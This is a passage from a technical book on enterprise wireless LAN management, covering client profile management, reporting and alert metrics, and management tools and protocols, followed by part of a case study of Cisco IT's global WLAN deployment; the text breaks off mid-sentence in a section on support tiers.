generates reports and alerts on hosts or devices that it can no longer contact might generate many
false-positive alerts or alarms, for example. Management tools that rely upon agents (or specific
management software) might create erroneous alerts if they cannot consistently contact these devices
on a predictable basis.
Diverse Nature of Wireless Endpoints

Remember that access points are not the only wireless devices on your network. Each client device is
also fitted with a radio and an antenna. So not only does your WLAN present you with the challenge of
dealing with many (sometimes hundreds or thousands) access points, but each client device also needs
to be dealt with.
Typically, an enterprise-class WLAN will standardize upon the infrastructure required for the WLAN; that
is, the design will detail what specific products are used, how the infrastructure devices are configured,
and so on. Such standardization is quite often not the case when it comes to client devices. There are
often many different makes and models of laptops or mobile devices within the company. Even laptops
that come with embedded wireless adaptors and that are manufactured by the same vendor will
sometimes have different radio interfaces. It is not uncommon for an enterprise to have a mixture of
different makes of laptops, different platforms (for example, Windows 2000, Windows XP, Linux, and
MacOS), different client adaptors, and differing versions of firmware and client software. Contrast this
with the wired network, where the vast majority of devices are easy to install; that is, you literally plug
them into the network and they work. You do not have to worry about whether the wireless network
adaptors have the latest firmware, whether the correct software application and version have been
installed, or whether the configuration of the software is completed and appropriate profiles have been
created.
Security Settings Management

Enterprise-class wireless networks should always have a robust security framework. This is discussed in
detail in Chapter 7. The typical security posture will detail not only the Extensible Authentication Protocol
(EAP) mechanism used for authentication and the encryption protocol used for data integrity, but also
fundamental characteristics such as the SSID.
Simply defining these protocols on the wireless infrastructure (the access points or WLAN controllers) is
not enough. You must also configure each client device with the correct settings. Each SSID/VLAN might
require different security postures. You might have separate virtual WLANs for voice, data, and guest
networking that each require different security settings. Many users will also have wireless at home or
will use public wireless services while traveling. These will also have different security requirements and
settings. In short, every WLAN client will almost certainly have multiple security postures.
To configure and manage the wide variety of devices and user groups correctly and appropriately, you
can use profiles, which are usually a collection of network and security settings required to ensure
connectivity. The wireless software on every device is configured with the correct security settings (for
example, SSID, EAP mechanism, and encryption protocol), which are then saved for repeated use. The
user can then simply select the appropriate profile for his or her current location.
For example, a typical user's laptop might have one or more profiles for the following:
Enterprise WLAN: Finance
Enterprise WLAN: Manufacturing
Home WLAN
Public Wireless Hotspot
Defining, configuring, and managing these profilesthe client's wireless security settingsmust be done in a
scalable and supportable manner. If the security profile in your wireless network changes, you must
have an easy way to update the client devices appropriately. Manually reconfiguring hundreds or
thousands of devices is a costly and error-prone effort. The more client platforms you have, the more
difficult this task becomes.
Many manufacturers do not address this challenge and instead rely upon the customer (you!) to handle
it. As mentioned previously, most wireless clients come with specific client software, and some operating
systems provide limited native wireless support. But this situation presents the enterprise with the
unenviable prospect of configuring each make and model laptop and each operating system on a caseby-case manner. There are different ways to approach this task, as described in the following sections.
Third-Party Wireless Software

You can adopt third-party wireless client software and install it on every laptop, regardless of the
wireless adaptor or operating system. As mentioned earlier, companies such as Meetinghouse Data
Communications provide universal wireless clients that address this problem. Not only do they support
most common wireless adaptors and operating systems, but they also provide centralized client and
profile management. It is possible to clearly define, distribute, and update profiles for your entire client
population.
The disadvantage of this option is that the third-party client software must be purchased for each
devicethat is, usually the third party charges a per-seat licensing fee. Conversely, this system can save
the enterprise money in the long term by reducing the operational overhead of supporting and managing
your various clients.
Centralized Self-Service Model

A centralized self-service model provides your user population with a one-stop shop for their wireless
security settings. Usually a web page where any client device, regardless of operating system, can
connect, this centralized location provides instructions on how to configure common settings or, in some
cases, scripts that can automate the process for the user. This approach avoids the requirement for IT
support staff to "touch" every client device, but it transfers the effort onto your users. Note that this
approach can sometimes result in increased technical support calls to your helpdesk as users
misinterpret instructions or make mistakes configuring their systems. However, it is more cost-effective
and less resource-intensive than having your IT staff visit and configure each device manually.
Standardization
Standardizing on a single client hardware platform will often provide the enterprise with a method of
client security management. Some wireless adaptor and laptop manufacturers provide wireless client
software with their systems. If you can standardize on such a system (be it a laptop or operating
system), you might be able to use some basic centralized client management features to create and
manage profiles.
Manual Process
Manually configuring clients for WLAN security settings is the least attractive and most expensive option.
Indeed, it is really a "do nothing" approach. You leave it entirely up to your end users to configure their
clients, whatever the client may be. The IT support staff simply publish or communicate the settings
(EAP mechanism, SSID, and encryption protocol) used for the enterprise WLAN, and the users configure
their own devices.
In some circumstances, you might need to have a manual process in addition to one of the previously
described detailed options simply because a particular client device has no management features. ASDs
(such as bar-code readers or wireless-enabled manufacturing equipment), for example, must be
manually configured by your IT support staff. As such manual configuration is a costly but sometimes
unavoidable option.
WLAN Reporting and Alerting

To successfully manage any network, timely and accurate information is required. Not only is current
and up-to-date information necessary (that is, "snapshots" of the WLAN in its current state), but also
historical reporting capabilities are required to help identify trends. Additionally, alerting capabilities are
important. WLAN reporting includes three related areas, as described in the following sections:
Standard/systematic reports
Trend reports
Alerts
Standard/Systematic Reports
Standard/systematic reports are the standard set of reports that your network management toolset can
generate on a regular basis. They are often called canned reports because they report upon common
queries. Your IT staff can run these reports when needed or on a regular basis, such as daily, weekly, or
monthly. These reports tend to be repeatable, with their reporting criteria remaining static.
Some examples include reports on the make, model, or configuration of access points in your wireless
network, the number of access points in a particular region or theater, a snapshot report on the number
of clients associated to a particular access point, the top ten traffic-generating clients or access points,
and so on.
The following list includes more detailed possibilities for sample standard reports:
Detailed status
Associations
QoS details
Security settings
Per VLAN clients
Host name/IP address/MAC address/serial number
Power status
RADIUS authentications
Per VLAN Client report
EAP/MAC failed authentication

Failed authentication
AP memory utilization
AP CPU utilization
AP packet statistics
AP packet errors
AP radio utilization
Associated clients statistics
Ethernet interface utilization
Uptime
Note
Although it is impossible to list all aspects of WLAN reporting, the lists in these sections include
some areas that you might want your WLAN management toolset or framework to monitor.
These lists should not be considered exclusive or comprehensive but rather indicative of the
kinds of reporting metrics. Values listed in the reports are examples only.
Trending
Trending reports are similar to standard reports, but they present the information over a period of time
instead of as a snapshot. They are often presented in graphical format, showing how the reported
characteristic has changed over a particular period, such as the maximum number of associated or
authenticated clients on a particular access point, the CPU utilization of access point, the interface
utilization on a particular port, and so on. As their name implies, trending reports identify trends and
help ensure that your IT department can proactively plan capacity, upgrade, reconfigure, or fine-tune
the network as the environment evolves and user behavior and network utilization changes.
The following list includes sample parameters for trending reports:
Group of access points
- RF utilization
- Ethernet utilization
- Number of associations
- Number of authentications
- Number of failed authentications
- Maximum client associations
- Maximum client associations graph
- Maximum percentage errors
Single access point
- RF transmission statistics
- Ethernet transmission statistics
- RF and Ethernet utilization graph
- RF and Ethernet utilization table
- Top N busiest clients
- Top N client error rate
Alerts
Alerting is the capability to generate alarms when certain criteria are met. Alerts are useful to identify
and remedy undesirable events. They enable reactive action on the part of your IT staff. When an alarm
is created and your network management framework has been alerted, IT staff can correct (or in some
circumstances, simply acknowledge) the problem.
Examples of common alerts include notification when the CPU utilization of an access point reaches 80
percent or higher, when the number of associated clients peaks above 20 users or devices, and when
channel utilization is above 85 percent. They are excellent indicators of complications on the network
and are often used to help direct the attention of your IT staff to problem areas, often before the user
population realizes or experience difficulties.
The following list includes more detailed possibilities for alerts:
Access point
- Do not broadcast SSID
- SNMP reachable
- CPU utilization above 60 percent
- CPU utilization above 80 percent
- Memory utilization above 60 percent
- Memory utilization above 80 percent

Ethernet interface
- Ethernet port status
- Ethernet port utilization above 60 percent
Ethernet port utilization above 80 percent radio interface
- RF port status down
- RF port utilization above 30 percent
- RF port utilization above 40 percent
- RF port packet errors above 10 percent
- RF port packet errors above 20 percent
- RF port WEP errors above 10 percent
- Max retry count 60 to 90 per interval
- Max retry count above 90 per interval
- Associated client count 15 to 30 per AP
- Associated client count above 30 per AP
- Associating rate 60 to 90 per poll
- Associating rate above 90 per poll
- Authentication rate 60 to 90 per poll
- Authentication rate above 90 per poll
- Interference detection (if possible)
Network/radio policies
- Rogue AP detection (if possible)
- Ad-hoc network detection (if possible)
- Detection of 100 association requests over 15 minutes
Management Tools
You have many options for adopting a toolset for WLAN management. A robust WLAN management
strategy is just as important as the actual tools used. So far in the chapter, you have learned about the
various areas and topics that such a strategy should encompass. Now let us consider the actual tools
that can help implement such a strategy.
Vendor-Specific WLAN Management Tools

Most enterprise-class wireless network solutions provide some native management features. These are
often a combination of support for open management standards and dedicated network management
products or appliances.
Dedicated, vendor-specific management systems are an important part of any robust WLAN
management framework. Such tools are typically worth the price. The added functionality and
management capabilities they provide not only help decrease the support burden on your IT staff (and
thus decrease the cost), but they also assist in providing dedicated and specific management and
reporting capabilities that are closely tied to the vendor's equipment. In effect, they are tailor-made to
monitor, manage, and report upon the particular vendor's equipment.
Such tools typically come with canned reports that will reduce the need for your team to define their
own. In some circumstances, they can be fully or partly integrated with existing management
frameworks, avoiding isolation and the use of standalone management tools for the WLAN. Vendorspecific management systems provide such features as
RF management
Rogue AP detection
Host management
Configuration management
Image management
Interference detection
Wireless intrusion detection
Wireless planning and optimization
Examples of vendor-specific management systems include the following:
Cisco Wireless LAN Solution Engine (WLSE)
Cisco Wireless Control Software (WCS)

Aruba RF Director
Symbol Mobility Services Platform (MSP)
Trapeze Networks RingMaster
Third-Party WLAN Management Tools

Several independent, nonvendor-specific tools are available that provide enterprises with dedicated
wireless tools. Typically these concentrate on WLAN network analysis, reporting, and sniffing. They are
used to monitor the WLAN, capture and analyze traffic, and provide detailed information about the RF
environment. Rather, they can be used for rogue AP detection, interference detection, traffic analysis,
security analysis, site surveying and planning and troubleshooting activities. They do not manage the
infrastructure and cannot be used to configure WLAN controllers or switches.
Examples of third-party WLAN management tools include the following:
AirMagnet
AiroPeek
Sniffer Pro Wireless
Thales Air Defence
Wireless Valley LANPlanner
Helium Networks SiteScout and SiteSense
Fluke Networks EtherScope and OptiView network analyzers
Common Network Management Platforms

Most large enterprise customers will already have an existing network management system in place,
usually for their wired network and associated services and applications. In many circumstances, these
can be extended to provide a modicum of wireless management, such as host monitoring and reporting
of device status. They tend to not provide wireless-specific reporting and usually only monitor up to the
access point. In effect, they are blind to the wireless side of the access point.
However, in some circumstances, these tools sufficient to address many of your basic needs. These tools
will certainly provide reporting and alerting on the status of the access points and various WLAN
controllers and management appliances (if you have deployed these). Finally, most vendor-specific tools
can be integrated with common network management platforms. This capability allows the enterprise to
continue to use the common network management platform as its primary toolset; the vendor-specific
WLAN management tools can be launched directly from the common network management application.
Examples of network management platforms include the following:
CA Unicenter
Cabletron Spectrum
Tivoli TME 10
IBM NetView
SunNet Manager/Solstice
CiscoWorks
HP Network Node Manager
BMC Software Inc. PATROL Visualis
Common Network Management Protocols

Many cross-technology, network-based management tools and standards can be used or leveraged in
managing WLANs. You will perhaps find that some of these, such as SNMP (Simple Network
Management Protocol), are already in use within your enterprise. Others, such as syslog or NetFlow, can
depend upon your environment. These protocols are often leveraged by existing network management
systems and in-house developed tools and scripts.
SNMP
SNMP is the open Internet standard for collecting network management information on TCP/IP networks
and is defined by the IETF 1157 RFC. It can also be used to configure certain settings.
Note
You can find all RFCs online at http://www.ietf.org/rfc.html, where you can search by RFC
number. If you do not know the RFC number, you can find it at the IETF RFC index at
http://www.ietf.org/iesg/1rfc_index.txt.
SNMP uses Management Information Bases (MIB) that define what information is available and what
settings can be made. Each device will have a MIB that provides this data. The network management
tool can then use SNMP to collect the information or make the changes that the MIB allows.
SNMP is very rarely used manually. It is a protocol for other tools and scripts. You will find that almost
all network management tools and applications use SNMP in some way, even if it is hidden from the IT
support professional.
SNMP is useful because it can also be used by custom-written tools and scripts that your IT support staff
can develop. If these skills do not exist in-house, then it is advised not to manually manipulate SNMP
settings on your network hardware.
Syslog
Syslog is a distributed logging service. Originally written for the UNIX operating system, it is now
common on many network infrastructure devices and systems. Unlike SNMP, which can be used to
change settings or configure systems, syslog is a "one-way" protocol. It simply sends logging
information to a syslog recorder. This recorder can then be used to review and analyze the logs. Syslog
is a useful tool for collecting information, but it is not as robust as SNMP and could be considered an
alternative if no SNMP skills exist within your organization but your staff is familiar with this protocol
instead.
NetFlow
NetFlow is a Cisco standard for capturing and analyzing network traffic. It is typically used in large
enterprises for accounting, network planning and analysis, monitoring (including application monitoring),
and user traffic analysis. It does not normally form part of an everyday wireless network management
toolset, but it is useful if your IT support staff need to review traffic patterns or troubleshoot esoteric or
hard-to-define problems. NetFlow also forms the basis of the upcoming IETF IPFIX standard, which you
can learn more about at http://www.ietf.org/html.charters/ipfix-charter.html.
RADIUS Accounting
AAA servers, by their very nature, provide accounting information on users being authenticated on the
network. Most enterprise WLANs will require users to provide credentials and passwords before gaining
access; the user must log on before using the network. Accounting information and AAA server reports
can therefore be useful in helping your IT support staff optimize the network.
By analyzing AAA and RADIUS reports, you can sometimes identify problems that might have otherwise
been difficult to discover. For example, multiple logon failures can point to a problem with a user's
credentials, timeouts for all users at a particular location can point to a WAN congestion, and so on. So
although RADIUS accounting and AAA reporting are not management tools in themselves, the visibility
they offer into the "backend" processes can often help in troubleshooting and fine-tuning your network.
IP Traffic and Analysis Features in Network Equipment

Most network equipment provides varying degrees of "built-in" traffic analysis and reporting tools.
Network routers and switches can be configured to collect data on traffic they handle. Statistics on IP
packets and interface utilization can be generated. Each equipment vendor provides different methods of
enabling these features.
This additional data can help in many ways, including capacity planning, fault identification, and
resolution or simple troubleshooting.
Internally Developed Tools

Internally developed tools are those that are created by your IT support staff, usually using scripting and
programming languages, that are specific to your enterprise. Because these tools are unique to each
environment, there are few guidelines that can be offered. Some enterprises develop tools internally to
plug gaps in their management framework. These tools could be automated access point configuration
utilities that leverage a scripting language and the AP command-line interface to log on to the device and
update settings, up to customized utilities that update or reconfigure client devices. They are often
developed to leverage common network management tools and standards such as SNMP or syslog (for
reporting).
Summary
Managing your wireless network falls under both the operating and optimizing phases of the solutions
lifecycle. It is an ongoing effort that will help ensure the success of your WLAN.
When defining your management strategy, one of the first decisions you should make is whether to
handle support in-house or to outsource this activity to a trusted partner. You can use the FCAPS model
to help define your management strategy. The underlying architecture of your network will help guide
you when considering centralized WLAN management versus a distributed model. Centralized WLAN
management avoids having to configure and manage each access point but usually requires dedicated
WLAN controllers or switches.
There are three common topics when considering WLAN management. You must be able to manage the
RF portions of your WLAN, you must be able to manage the physical infrastructure or hosts, and you
must also consider client management, which is often the most challenging aspect of all.
WLANs, by their very nature, are more difficult to manage than regular wired networks. Client devices on
a WLAN are constantly on the move, create more load on your AAA as they repeatedly authenticate and
reauthenticate, and are not as predictable in their location as normal wired network clients such as
desktop computers. WLANs are also based upon radio frequency technologies, and radio is a very
dynamic and constantly changing medium, subject to interference, contention, and environmental
factors.
Another important topic that you should not overlook is managing the security framework of your WLAN.
Because WLANs transmit their traffic via radio waves, you must ensure that you have a strong security
architecture to maintain the integrity of your network and the data on it. Do not overlook security
management because this is an area where you will most likely need to regularly audit, fine-tune, and
revise.
You can address all these challenges with a robust management framework and tools. Many options are
available to you, including those provided by the manufacturers of the equipment you installed all the
way to independent third-party solutions that you can purchase and integrate with existing systems you
might already have. Finally, do not overlook the possibility of using dedicated wireless diagnostic tools
for your IT staff and even developing some tools and utilities in-house if you have the technical
resources available.
Chapter 9. Enterprise Case Study
In 2000, Cisco information technology (IT) began developing a consistent and supported global wireless
networking architecture. During this process, IT recognized a growing number of non-IT deployments
throughout the company, led by user demand for the benefits offered by wireless networking. These
WLANs were purchased, deployed, and supported by local teams without IT support or supervision. This
situation resulted in many inconsistent "gray IT" deployments, often with poor security and sometimes
involving ready-to-use wireless solutions with no security. Most of these "DIY" networks used Cisco
Aironet access points, but wireless products from other manufacturers were also identified. Even when
the same products were used, software versions and configurations were often different.
Business Model
The business model for deploying enterprise-class WLANs in the Cisco internal environment was based
upon two underlying fundamentals:
The desire to embrace and showcase new technology where Cisco Systems led the industry
The realization of the real and measurable benefits that wireless networks would provide to the
Cisco global workforce, a workforce that was already partly "mobilized" by the provision of laptops
to all staff
Defining the Business Case

The issue for Cisco IT was not whether WLANs should be deployed, because Cisco Systems had long
since identified the many benefits offered by the technology, but rather determining how to costeffectively maintain control, reduce overall support costs, ensure a secure wireless infrastructure, and
still provide benefits to Cisco employees. The project team realized that WLANs would deliver
productivity benefits. Additionally, Cisco already had a highly mobile workforce where almost every
employee (in excess of 37,000) was issued a laptop computer. Most onsite vendors and contractors
were also similarly equipped.
Potential mobility (and therefore additional productivity) was limited, however, because of one simple
fact: Laptops usersindeed all userswere "tethered" to their desks by the traditional Ethernet cable. This
simple fact alone negatively impacted the vast potential benefit that user mobility offered to the
corporation.
The Strategic Value

The strategic value of wireless networking was characterized by five guiding principles:
Business value WLANs should be productivity tools, enabling greater mobility for Cisco
employees.
Comprehensive entitlement Each Cisco employee, regardless of position, should have access to
the global wireless network.
Ubiquitous coverage The WLANs should be built on global, scalable standards to provide a single,
worldwide wireless network.
Security IT had to design a secure architecture that did not rely upon the then-prevalent, yet
insecure, static Wired Equivalent Privacy (WEP) shared-key framework.
Ease of use User friendliness and a common user experience across all Cisco sites were essential
for widespread adoption.
Cisco IT identified additional security principles, including these:
WLANs should support both privacy and access control through enterprise-class authentication and
encryption capabilities.
Network attacks must be mitigated.
Rogue access points must be detected and remediated.
The selection of a suitable WLAN technology was an easy one. As the world's leader in the manufacture
of enterprise-class WLAN equipment, Cisco did not have difficulty in choosing the products to deploy.
Cisco did, however, need to define, deploy, and provision a robust end-to-end solution.
Architecture Principles
When considering the architecture of your WLAN, your assessment must encompass many points. This
section examines some of the factors that affected the enterprise WLAN deployment at Cisco Systems,
as follows:
Topology
802.11 wireless networking standards
Client-to-AP ratio
Signal strength
Roaming
Radio cell architecture
Global naming standards
Cisco Aironet access points
Cisco Secure Access Control Server (ACS)
Topology
Early in the planning stage, the Cisco IT WLAN Architecture team decided that the WLAN would be a
secondary network complementing the existing wired network (that is, a separate "overlay" network).
Each large building would use a single Layer 3 domain within each building to help ensure session
integrity for wireless devices moving within or between floors. Effectively, each building had a unique
wireless subnet, where both the access points and the wireless devices shared IP addresses from a
common Class C address pool. However, in line with prudent IP address management, smaller buildings
with fewer than 20 or 30 users shared a common VLAN for both wired and wireless devices.
Additionally, at the time of deployment, the Cisco Aironet product line was based solely on a distributed,
autonomous access point (or so-called "Intelligent AP") model. Each access point was a unique,
managed host with full intelligence and configurability. As such, the current global WLAN is a distributed
model with over 3000 intelligent IOS access points in production. Figure 9-1 shows a basic topological
diagram of the initial enterprise WLAN. The access points are connected directly to standard Layer 2
switches, and network management is provided by the Wireless LAN Solution Engine (WLSE) and the
internally developed Enterprise Management (EMAN) toolset.
Figure 9-1. Basic Topology of the Cisco Enterprise WLAN
In 2000, the architecture standard called for Cisco Aironet 350 Series access points to be connected to
the nearest access-layer switch, as shown in Figure 9-2 . A separate cable provides console access to
each access point to mitigate a loss of network connectivity, a practice that Cisco IT has standardized for
all network devices. The console network is used for out-of-band (OOB) network management,
configuration, and troubleshooting. Figure 9-2 shows how each access point is connected to the
production data network and via a separate cable to the console network.
Figure 9-2. Access Points Connected to Production Data Network and

Console Network
Because of ongoing developments in WLAN technologies, Cisco decided to redesign its enterprise
wireless network in 2005. This project, known internally as the NexGen WLAN, will feature a combination
of autonomous (IOS-based) access points and new centrally managed (LWAPP-based) access points,
controlled and managed by WLAN controllers. Further information on the Cisco IT strategy can be found
in the section "What the Future Holds " later in this chapter.
Note
Lightweight Access Point Protocol (LWAPP) is a protocol used to allow WLAN controllers to configure, manage
access points in the Cisco Centralized WLAN Solution. LWAPP introduces a split MAC , which allows real-time
and certain real-time portions of MAC management to be accomplished within the access point, while WLAN c
handle authentication, security management, and mobility.
More detailed information on LWAPP and the Cisco Centralized WLAN Solution can be found at
http://www.cisco.com/en/US/netsol/ns340/ns394/ns348/ns337/networking_solutions_white_paper0900aecd
or by going to Cisco.com and searching for "Understanding the Lightweight Access Point Protocol (LWAPP)."
802.11 Wireless Networking Standards

At the time that the architecture team was designing the global WLAN, the only ratified standard was
802.11b, providing raw data rates of up to 11 Mbps in the 2.4-GHz frequency range. Therefore, this
standard was adopted for the global enterprise wireless network.
Based upon internal Cisco IT policies and procedures, new products and standards must first undergo
prudent and comprehensive testing and certification before they are used in the production environment.
Shortly after ratification, the 802.11g standard was internally certified for use within Cisco by the
architecture team. Today, therefore, Cisco is deploying 802.11g Cisco Aironet access points and client
devices in its WLANs. 802.11g was selected over 802.11a because it also works in the 2.4-GHz
frequency band and therefore offers seamless backward compatibility with the existing 802.11b network.
Apart from limited lab and showcase sites, the 802.11a standard was not deployed in a widespread
manner, but it will form part of the NexGen WLAN that is currently being designed by the architecture
team; see the "What the Future Holds " section for more details.
Although 802.11g supports data rates of up to 54 Mbps in the 2.4-GHz band, these higher speeds are
only available to 802.11g clients. Furthermore, 802.11g access points "step down" their speed when
older 802.11b clients are associated to ensure backward compatibility. As such, it is not uncommon to
find many 802.11g access points working at a maximum of 11 Mbps (effectively in 802.11b, or "legacy"
mode). Such circumstances will decrease as the number of older 802.11b clients diminishes in line with
the introduction of new laptops and replacement of the older devices.
Client-to-AP Ratio
After careful traffic analysis, Cisco IT built its architecture on a user-to-AP ratio of 25:1 would provide
acceptable performance. At that time (early 2000), it was deemed unlikely that all 25 users would be
accessing the WLAN at the same time and even more unlikely that they would all be simultaneously
sending or receiving large amounts of data. Because the WLAN was an overlay network, those users who
needed to use bandwidth-intensive applications such as network backups or video streaming were
encouraged to use the wired network and not depend on the wireless network for these functions.
However, Cisco IT has found that adoption has been extremely high. Within 12 months of deployment,
Cisco IT commissioned an internal "Voice of the Client" survey, which showed that 92 percent of staff
were using the WLAN on a weekly basis; furthermore, 27 percent of users were relying upon the WLAN
as their "primary or only network access medium." Even with the limitation of the 802.11b data rate of
11 Mbps (or actual throughput of 6 Mbps), day-to-day performance has not been adversely affected and
is deemed perfectly acceptable for the vast majority of user activity. Comments from users have been
overwhelmingly positive.
Some Cisco buildings use wireless connectivity almost exclusively. This includes network backups,
software downloads, video unicast, and Cisco IP Communicator (a software-based IP phone), in addition
to standard web browsing, e-mail, and calendars. Rich Gore, Cisco IT project manager, says, "With
quality of service now supported over wireless, I've been taking all my phone calls over the wireless
network using Cisco IP Communicator, and it's been working perfectly."
Note
Users always have the option of manually connecting their laptops to the wired network if they
so wish, but this practice is by no means standard for most users.
Moving forward, a lower user to AP ratio (approximately 12:1) has been recommended as reliance upon
the WLAN increases and adoption has proven to be widespread. This topic is covered in more detail in
the "What the Future Holds " section later in this chapter.
Signal Strength
Cisco Aironet access points can broadcast up to 100mW (depending on the regulatory domain). When
such high transmission power is used, it is possible for the WLAN coverage to extend beyond the
originally desired areas, potentially reaching out into parking lots and public areas. After conducting
tests, the architecture team established standards that call for using the minimum power to reach all
areas within buildings, but never exceeding 20mW. That is, the "less is best" approach is taken. Access
points are ideally configured to use 1mW, 2mW, 5mW, and so on, but never more than 20mW.
In some instances, directional antennas have been used to more narrowly focus the signal, reducing the
power required to achieve full coverage. Where necessary, rather than increasing transmit power to
exceed 20mW, additional access points are installed to cover "dead" spots.
Roaming
To more accurately control roaming, the WLAN client software (in this case, the Cisco Aironet Client
Utility [ ACU]) was configured to roam only under certain circumstancesthat is, when the current signal
strength has dropped below a specified threshold or number of retries. This configuration reduces the
tendency to reassociate to a new access point and helps avoid flip-flopping.
Each time the user switches from one access point to another, connectivity is momentarily lost,
necessitating reauthentication. Numerous reauthentication requests can increase load on the
authentication server, which can adversely affect service. This situation can be particularly notable in
wireless voice applications, with clearly discernable "stutter" as the client reassociates and authenticates.
Radio Cell Architecture

If cells overlap too much, continual switching ("flip-flopping") is possible. Cisco adopted an overlap of
about 15 percent (roughly 10 feet in most buildings) to minimize this possibility.
As we mentioned in Chapter 5 , the 802.11 standard allows for devices to connect at various data rates
depending on the RF environment. To minimize this effect, the architecture team locked the data rate at
11 Mbps. Thus, the user's wireless connection will never "step down" but rather will associate to a
different access point when it is far enough away from the original access point. This solution controls
the roaming and avoids flip-flopping between access points, which in turn greatly assists in
troubleshooting and predicting client behavior.
The policy for 802.11g cells is to permit data speeds as high as possible, but never less than 802.11b
(11 Mbps). This results in the ability of newer 802.11g clients to associate with the latest model 802.11g
access points at higher than 11-Mbps speeds in some circumstances. However, association rates at
lower than 11 Mbps are never permitted.
Global Naming Standards

Cisco uses a clear, concise, and consistent naming standard for all access points. This standard aids
greatly in troubleshooting and also provides users and network engineers with useful information about
their current access point.
The naming standard is as follows:
< site name >-AP<floor ><AP letter >.cisco.com
For example, for the third access point on the second floor of a New York office, the access point name
could be NYC-AP2c.cisco.com
Cisco IT has found that a consistent naming standard allows for easier management.
Cisco Aironet Access Points

When originally deployed, the Cisco Aironet 350 Series Access Point was selected as the standard access
point. The Cisco Aironet 350 Series was the most advanced, fully featured wireless access point
available. It supported the 802.11b protocol standard (the most advanced at that time), which provides
data rates of up to 11 Mbps. The Cisco Aironet 350 Series also supported inline Power over Ethernet
(PoE), which greatly simplifies installation and reduces costs by eliminating the need for separate,
dedicated power cabling to the main supply.
PoE allows the access point to draw power through its Ethernet cable, from the switch to which it is
connected. In some circumstances, where certain sites did not have switches that supported PoE, Cisco
IT used standalone "power injectors." These devices sit inline between the network switch and the
access point and "inject" DC power into the cable. This allowed Cisco IT to continue using PoE at all
locations, even where they had older switches that did not provide PoE or that did not have sufficient
power capacity to power all the access points required. Figure 9-3 shows how a power injector sits in
between the access point and the switch.
Figure 9-3. Using Power Injectors to Provide PoE When It Is Not Available
from the Switch
Today, Cisco IT is expanding and enhancing its initial Cisco Aironet 350 Series deployments by installing
Cisco Aironet 1000, 1100, and 1200 Series access points. These access points support new 802.11
standards and additional feature enhancements and options for modular and flexible WLAN deployments,
including the centralized, controller-based architecture or the distributed autonomous access point
architecture. At the time of writing, approximately 25 percent of the access points were the 1200 series.
This percentage will rise to 100 percent with the NexGen WLAN.
Cisco Secure Access Control Server ( ACS)

The Cisco Secure ACS is used as the standard AAA server for the global WLAN and for other recently
introduced services such as 802.1x-based port authentication for wired Ethernet ports in public areas
and Network Access Control (NAC), part of the Cisco Self-Defending Network security strategy. Pairs of
Cisco Secure ACSs were deployed at strategic locations worldwide.
The value of using a globally distributed AAA architecture instead of a single AAA server was highlighted
by the WLAN deployment. Because of the greater load that a WLAN creates for AAA, due to
authentications and reauthentications (as the client device roams from AP to AP), it was important to
ensure that all users did not have to rely upon a single, centralized server. This would have introduced
unacceptable delays for users in geographically remote areas. As such, at 13 different locations around
the world, Cisco placed two ACS servers, in a load-balanced configuration, that served as AAA servers
for that local geographical region.
The ACS servers are fully integrated with the Cisco Active Directory domain structure, enabling a single
sign-on (SSO) capability. Effectively, AD user credentials are used not only for access to their laptops
and wired network but also to provide transparent authentication to the wireless network. SSO has
greatly reduced the client impact for users and has helped ensure a common, user-friendly experience
across platforms and transport media. Users need only remember their normal ID and password for
access to their laptop, the wired network, and the wireless network, and they only have to enter their
credentials once each session regardless of the transport medium they are using.
Network Management
To date, more than 3100 Cisco Aironet access points have been deployed worldwide, supporting more
than 50,000 users. This includes over 37,000 full-time Cisco employees, as well as over 10,000
temporary, contractor, and vendor staff. A WLAN as widely used as this requires a robust management
capability. Because a dedicated wireless management system was not available in 2000, the Cisco
wireless network was managed through EMAN, an internally developed web-based enterprisemanagement framework. Today, Cisco IT also uses the CiscoWorks WLSE, a Cisco appliance for
managing WLAN deployments.
Client Management
Client management is a challenging area, and Cisco has implemented robust business processes to
address it. Before 2004, all client devices were based upon Cisco-manufactured client adaptors, radios,
and devices. However, the Cisco Client Extensions ( CCX) is a technology licensing scheme that allows
third-party manufacturers to produce equipment that supports Cisco value-added capabilities. With CCX,
many third-party client devices and platforms have been introduced within the production environment.
To address this issue, Cisco made the decision to adopt third-party wireless software for all platforms.
This adoption ensures that a common software application is used for all operating systems (Windows
2000, Windows XP, Linux, MacOS, and so on), regardless of the particular adaptor used in the relevant
laptop (Cisco adaptors, Intel Centrino laptops, Macintosh PowerBooks, and so on).
The third-party supplicant also provides a consistent management toolset to allow for centralized profile
management and configuration.
A centralized client management solution is also used to facilitate software distribution and updates.
Service dashboards, which are internal intranet websites, also provide service information, user
communication, software, and self-service configuration utilities for all users. All Cisco staff can use
dashboards for instructions on how to manually configure or update their systems. Because dashboards
are based on standard HTML pages, they are platform agnostic and suitable for all platforms and clients
that support HTTP.
Service and Support

Network devices, systems, and applications on the Cisco global network are managed according to levels
of impact to the business. Service or support levels fall into four categories:
Priority 1 (P1) Immediate and severe business impact including revenue loss (actual, not
postponed); inability to make or ship product; inability to develop code or product; inability to
meet contractual, legal, or government-imposed processing deadlines; impact to external Cisco
customers, partners, or supplier processes with negative implications for relations, market
perception, or revenue; or engineering groups unable to work on a critical customer build or fix
other critical account issues.
Priority 2 (P2) Adverse business impact including the inability of an organization (or
organizations) within Cisco to perform daily operations such that it is essentially idle; or direct and
critical impact to executives within the company, or to development, test, disaster-recovery, or
staging environment for a P1 service or system.

Priority 3 (P3) Low business impact including the inability of multiple users to perform their daily
tasks such that they are essentially idle; or impact to a single user under an approved, documented
Service Level Agreement (SLA) requirement, or to a development, test, disaster-recovery, or
staging environment for a P2 service or system.
Priority 4 (P4) Minor or no business impact to Cisco such as a question or new service request, or
a problem that keeps one employee from performing part of a job function.
Within this support-level structure, Cisco Secure ACSs are managed as a P1 device because they are
critical not only for WLAN access, but also for NAC, an element of the Cisco Self-Defending Network
security strategy. The wireless network was originally managed as a P4 because it was considered a
secondary network to the wired network. However, because of widespread adoption and usage within
Cisco, support for the WLAN has become equivalent to P2. Cisco envisions that the NexGen WLAN, based
upon more advanced and intelligent wireless networking technologies, will be formally supported on a P2
basis.
Cisco Support Team

Cisco has a four-tier support model, as follows:
Tier 1: Frontline Global Technical Resource Center (GTRC) This is equivalent to a standard
internal helpdesk. Agents are familiar with the most common problems and work from prepared
scripts and troubleshooting guides. Each GTRC hub has a nominated wireless LAN expert who is
more familiar with the solution than his colleagues.
Cases that are handled at this level are usually client configuration issues or the initial reports of
service outages. Problems that cannot be solved by the GTRC are escalated to Tier 2 support.
Tier 2: Cisco IT WLAN network operations team These Cisco IT engineers are responsible for
